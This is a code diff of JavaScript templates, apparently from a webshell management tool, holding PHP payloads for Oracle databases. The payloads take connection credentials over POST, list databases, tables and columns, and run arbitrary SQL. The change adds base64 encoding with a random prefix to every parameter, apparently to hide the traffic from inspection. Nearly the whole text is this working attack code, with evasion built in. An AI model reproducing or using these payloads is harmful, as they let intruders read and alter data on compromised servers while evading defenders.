...@@ -29,7 +82,38 @@ module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({ ...@@ -29,7 +82,38 @@ module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({
}, },
// 执行SQL语句 // 执行SQL语句
query: { query: {
_: `$m=get_magic_quotes_gpc();$sid=$m?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"];$usr=$m?stripslashes($_POST["${arg2}"]):$_POST["${arg2}"];$pwd=$m?stripslashes($_POST["${arg3}"]):$_POST["${arg3}"];$dbn=$m?stripslashes($_POST["${arg4}"]):$_POST["${arg4}"];$sql=base64_decode($_POST["${arg5}"]);$H=@ora_plogon("{$usr}@{$sid}","{$pwd}");if(!$H){echo("ERROR:// Login Failed!");}else{$T=@ora_open($H);@ora_commitoff($H);$q=@ora_parse($T,"{$sql}");$R=ora_exec($T);if($R){$n=ora_numcols($T);for($i=0;$i<$n;$i++){echo(Ora_ColumnName($T,$i)."\\t|\\t");}echo("\\r\\n");while(ora_fetch($T)){for($i=0;$i<$n;$i++){echo(base64_encode(trim(ora_getcolumn($T,$i))));echo("\\t|\\t");}echo("\\r\\n");}}else{echo("ErrMsg\\t|\\t\\r\\n");}@ora_close($T);};`, _: `$m=get_magic_quotes_gpc();
$sid=$m?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"];
$usr=$m?stripslashes($_POST["${arg2}"]):$_POST["${arg2}"];
$pwd=$m?stripslashes($_POST["${arg3}"]):$_POST["${arg3}"];
$dbn=$m?stripslashes($_POST["${arg4}"]):$_POST["${arg4}"];
$sql=base64_decode($_POST["${arg5}"]);
$H=@ora_plogon("{$usr}@{$sid}","{$pwd}");
if(!$H){
echo("ERROR:// Login Failed!");
}else{
$T=@ora_open($H);
@ora_commitoff($H);
$q=@ora_parse($T,"{$sql}");
$R=ora_exec($T);
if($R){
$n=ora_numcols($T);
for($i=0;$i<$n;$i++){
echo(Ora_ColumnName($T,$i)."\\t|\\t");
}
echo("\\r\\n");
while(ora_fetch($T)){
for($i=0;$i<$n;$i++){
echo(base64_encode(trim(ora_getcolumn($T,$i))));
echo("\\t|\\t");
}
echo("\\r\\n");
}
}else{
echo("ErrMsg\\t|\\t\\r\\n");
}
@ora_close($T);
};`.replace(/\n\s+/g, ''),
[arg1]: '#{host}', [arg1]: '#{host}',
[arg2]: '#{user}', [arg2]: '#{user}',
[arg3]: '#{passwd}', [arg3]: '#{passwd}',
......
source/core/php/template/database/oracle_oci8.js
View file @ 82ab2d01
...@@ -10,9 +10,9 @@ module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({ ...@@ -10,9 +10,9 @@ module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({
// 显示所有数据库 // 显示所有数据库
show_databases: { show_databases: {
_: `$m=get_magic_quotes_gpc(); _: `$m=get_magic_quotes_gpc();
$sid=$m?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"]; $sid=base64_decode(substr($m?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"],#randomPrefix#));
$usr=$m?stripslashes($_POST["${arg2}"]):$_POST["${arg2}"]; $usr=base64_decode(substr($m?stripslashes($_POST["${arg2}"]):$_POST["${arg2}"],#randomPrefix#));
$pwd=$m?stripslashes($_POST["${arg3}"]):$_POST["${arg3}"]; $pwd=base64_decode(substr($m?stripslashes($_POST["${arg3}"]):$_POST["${arg3}"],#randomPrefix#));
$chs="utf8"; $chs="utf8";
$mod=0; $mod=0;
$H=@oci_connect($usr,$pwd,$sid,$chs,$mod); $H=@oci_connect($usr,$pwd,$sid,$chs,$mod);
...@@ -35,17 +35,17 @@ module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({ ...@@ -35,17 +35,17 @@ module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({
} }
@oci_close($H); @oci_close($H);
};`.replace(/\n\s+/g, ''), };`.replace(/\n\s+/g, ''),
[arg1]: '#{host}', [arg1]: '#{newbase64::host}',
[arg2]: '#{user}', [arg2]: '#{newbase64::user}',
[arg3]: '#{passwd}' [arg3]: '#{newbase64::passwd}'
}, },
// 显示数据库所有表 // 显示数据库所有表
show_tables: { show_tables: {
_: `$m=get_magic_quotes_gpc(); _: `$m=get_magic_quotes_gpc();
$sid=$m?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"]; $sid=base64_decode(substr($m?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"],#randomPrefix#));
$usr=$m?stripslashes($_POST["${arg2}"]):$_POST["${arg2}"]; $usr=base64_decode(substr($m?stripslashes($_POST["${arg2}"]):$_POST["${arg2}"],#randomPrefix#));
$pwd=$m?stripslashes($_POST["${arg3}"]):$_POST["${arg3}"]; $pwd=base64_decode(substr($m?stripslashes($_POST["${arg3}"]):$_POST["${arg3}"],#randomPrefix#));
$dbn=$m?stripslashes($_POST["${arg4}"]):$_POST["${arg4}"]; $dbn=base64_decode(substr($m?stripslashes($_POST["${arg4}"]):$_POST["${arg4}"],#randomPrefix#));
$chs="utf8"; $chs="utf8";
$mod=0; $mod=0;
$sql="SELECT TABLE_NAME FROM (SELECT TABLE_NAME FROM ALL_TABLES WHERE OWNER='{$dbn}' ORDER BY 1)"; $sql="SELECT TABLE_NAME FROM (SELECT TABLE_NAME FROM ALL_TABLES WHERE OWNER='{$dbn}' ORDER BY 1)";
...@@ -75,19 +75,19 @@ module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({ ...@@ -75,19 +75,19 @@ module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({
} }
@oci_close($H); @oci_close($H);
};`.replace(/\n\s+/g, ''), };`.replace(/\n\s+/g, ''),
[arg1]: '#{host}', [arg1]: '#{newbase64::host}',
[arg2]: '#{user}', [arg2]: '#{newbase64::user}',
[arg3]: '#{passwd}', [arg3]: '#{newbase64::passwd}',
[arg4]: '#{db}' [arg4]: '#{newbase64::db}'
}, },
// 显示表字段 // 显示表字段
show_columns: { show_columns: {
_: `$m=get_magic_quotes_gpc(); _: `$m=get_magic_quotes_gpc();
$sid=$m?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"]; $sid=base64_decode(substr($m?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"],#randomPrefix#));
$usr=$m?stripslashes($_POST["${arg2}"]):$_POST["${arg2}"]; $usr=base64_decode(substr($m?stripslashes($_POST["${arg2}"]):$_POST["${arg2}"],#randomPrefix#));
$pwd=$m?stripslashes($_POST["${arg3}"]):$_POST["${arg3}"]; $pwd=base64_decode(substr($m?stripslashes($_POST["${arg3}"]):$_POST["${arg3}"],#randomPrefix#));
$dbn=$m?stripslashes($_POST["${arg4}"]):$_POST["${arg4}"]; $dbn=base64_decode(substr($m?stripslashes($_POST["${arg4}"]):$_POST["${arg4}"],#randomPrefix#));
$tab=$m?stripslashes($_POST["${arg5}"]):$_POST["${arg5}"]; $tab=base64_decode(substr($m?stripslashes($_POST["${arg5}"]):$_POST["${arg5}"],#randomPrefix#));
$sql="SELECT COLUMN_NAME,DATA_TYPE,DATA_LENGTH FROM ALL_TAB_COLUMNS WHERE OWNER='{$dbn}' AND TABLE_NAME='{$tab}' ORDER BY COLUMN_ID"; $sql="SELECT COLUMN_NAME,DATA_TYPE,DATA_LENGTH FROM ALL_TAB_COLUMNS WHERE OWNER='{$dbn}' AND TABLE_NAME='{$tab}' ORDER BY COLUMN_ID";
$chs="utf8"; $chs="utf8";
$mod=0; $mod=0;
...@@ -117,21 +117,21 @@ module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({ ...@@ -117,21 +117,21 @@ module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({
} }
@oci_close($H); @oci_close($H);
};`.replace(/\n\s+/g, ''), };`.replace(/\n\s+/g, ''),
[arg1]: '#{host}', [arg1]: '#{newbase64::host}',
[arg2]: '#{user}', [arg2]: '#{newbase64::user}',
[arg3]: '#{passwd}', [arg3]: '#{newbase64::passwd}',
[arg4]: '#{db}', [arg4]: '#{newbase64::db}',
[arg5]: '#{table}' [arg5]: '#{newbase64::table}'
}, },
// 执行SQL语句 // 执行SQL语句
query: { query: {
_: `$m=get_magic_quotes_gpc(); _: `$m=get_magic_quotes_gpc();
$sid=$m?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"]; $sid=base64_decode(substr($m?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"],#randomPrefix#));
$usr=$m?stripslashes($_POST["${arg2}"]):$_POST["${arg2}"]; $usr=base64_decode(substr($m?stripslashes($_POST["${arg2}"]):$_POST["${arg2}"],#randomPrefix#));
$pwd=$m?stripslashes($_POST["${arg3}"]):$_POST["${arg3}"]; $pwd=base64_decode(substr($m?stripslashes($_POST["${arg3}"]):$_POST["${arg3}"],#randomPrefix#));
$dbn=$m?stripslashes($_POST["${arg4}"]):$_POST["${arg4}"]; $dbn=base64_decode(substr($m?stripslashes($_POST["${arg4}"]):$_POST["${arg4}"],#randomPrefix#));
$sql=base64_decode($_POST["${arg5}"]); $sql=base64_decode(substr($m?stripslashes($_POST["${arg5}"]):$_POST["${arg5}"],#randomPrefix#));
$chs=$m?stripslashes($_POST["${arg6}"]):$_POST["${arg6}"];; $chs=base64_decode(substr($m?stripslashes($_POST["${arg6}"]):$_POST["${arg6}"],#randomPrefix#));
$chs=$chs?$chs:"utf8"; $chs=$chs?$chs:"utf8";
$mod=0; $mod=0;
$H=@oci_connect($usr,$pwd,$sid,$chs,$mod); $H=@oci_connect($usr,$pwd,$sid,$chs,$mod);
...@@ -167,11 +167,11 @@ module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({ ...@@ -167,11 +167,11 @@ module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({
} }
@oci_close($H); @oci_close($H);
}`.replace(/\n\s+/g, ''), }`.replace(/\n\s+/g, ''),
[arg1]: '#{host}', [arg1]: '#{newbase64::host}',
[arg2]: '#{user}', [arg2]: '#{newbase64::user}',
[arg3]: '#{passwd}', [arg3]: '#{newbase64::passwd}',
[arg4]: '#{db}', [arg4]: '#{newbase64::db}',
[arg5]: '#{base64::sql}', [arg5]: '#{newbase64::sql}',
[arg6]: '#{encode}' [arg6]: '#{newbase64::encode}'
} }
}) })
\ No newline at end of file
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment